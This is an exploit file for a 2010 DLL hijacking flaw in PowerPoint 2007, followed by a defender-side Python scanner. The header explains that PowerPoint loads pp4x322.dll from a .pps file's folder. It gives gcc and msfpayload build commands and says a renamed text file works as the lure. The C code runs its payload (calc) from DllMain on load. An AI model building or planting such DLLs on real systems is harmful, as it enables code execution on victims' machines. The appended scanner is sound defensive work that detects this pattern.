/*
Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at} hotmail.com)
Software Link: http://office.microsoft.com/en-us/

Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting.
Rapid7 write up: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002

http://monstream00.wordpress.com/

gcc -shared -o pp4x322.dll powerpoint2007-DLL.c
or
msfpayload windows/exec CMD=calc.exe D > pp4x322.dll

.pps file affected. Power Point looks for pp4x322.dll in same directory as the .pps
extension and loads the DLL. This will not work with real .pps but will work with a
text file if extension is changed to a .pps instead of .txt.

I have tested it on Windows 7 64bit and it works. Rapid 7 has a great article on DLL
Hijacking and it is a must read.
*/

#include <windows.h>
#include <stdlib.h>

/* Proof-of-concept payload: start calc and end the host process. */
int hax()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Called by the loader as soon as the host process maps the DLL. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return 0;
}
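A defender-side check for the pattern described in the header comment, as an added example that is not part of the original exploit file: it walks a directory tree (for instance a file share) and reports any DLL sitting beside a .pps file, marking the pp4x322.dll name and any .pps that lacks the OLE2 header of a genuine binary slideshow. The function and field names are assumptions made for this example.

```python
import os

# Name and extension come from the write-up above; extend the sets for other cases.
KNOWN_HIJACK_DLLS = {"pp4x322.dll"}
DOC_EXTS = {".pps"}
# Signature at offset 0 of an OLE2 compound file, the container of a real binary .pps.
OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")


def is_real_ole(path):
    """True if the file starts with the OLE2 compound-file signature."""
    with open(path, "rb") as fh:
        return fh.read(len(OLE2_MAGIC)) == OLE2_MAGIC


def scan(root):
    """Return one finding per DLL that shares a directory with a watched document."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        docs = [f for f in files if os.path.splitext(f)[1].lower() in DOC_EXTS]
        dlls = [f for f in files if f.lower().endswith(".dll")]
        if not docs or not dlls:
            continue
        # Documents that are not OLE2 files match the renamed-text-file lure.
        fake_docs = sorted(d for d in docs
                           if not is_real_ole(os.path.join(dirpath, d)))
        for dll in sorted(dlls):
            findings.append({
                "dir": dirpath,
                "dll": dll,
                "known_name": dll.lower() in KNOWN_HIJACK_DLLS,
                "fake_docs": fake_docs,
            })
    return findings


if __name__ == "__main__":
    import sys
    for f in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        level = "HIGH" if f["known_name"] else "REVIEW"
        print(f"[{level}] {f['dir']}: {f['dll']} beside {f['fake_docs'] or 'documents'}")
```

Run it with the path of the share or download folder to audit; a directory that holds only documents or only DLLs produces no finding.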